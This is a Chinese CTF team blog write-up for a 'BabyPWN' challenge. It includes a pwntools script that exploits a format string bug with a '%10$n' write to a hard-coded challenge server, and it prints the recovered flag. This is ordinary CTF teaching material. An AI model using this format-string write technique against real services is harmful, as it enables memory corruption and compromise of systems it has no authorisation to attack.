g2uc

TeamBlog

[PWN]0x07 BabyPWN

题目文件:
链接:


基础的PWN题,用ida载入题目文件后F5查看伪代码:

可以看到23行位置有明显的格式化字符串漏洞.
构造脚本如下:

from pwn import *

p = remote('47.100.247.171', 10000)

pwnme_addr = 0x0804A068

payload1 = "ABCD"
payload2 = p32(pwnme_addr) + 'aaaa%10$n'

p.recvuntil('Input your name in here :\n')
p.sendline(payload1)

p.recvuntil('Input the message in here:\n')
p.sendline(payload2)

print p.recv()
print p.recv()

FLAG值:
flag{72cd1387-04ff-4daf-8715-6b6121f2c265}

发表评论:

搜索
标签列表
网站分类
文章归档
站点信息
  • 文章总数:20
  • 页面总数:0
  • 分类总数:4
  • 标签总数:7
  • 评论总数:1
  • 浏览总数:566
控制面板
您好,欢迎到访网站!
  查看权限

Powered By Z-BlogPHP 1.5.2 Zero

Copyright g2uc Rights Reserved.

公告

请把不属于分类中比赛的题目wp发布在essay分类!另外,题解文章请记得在标签里标注题目类型!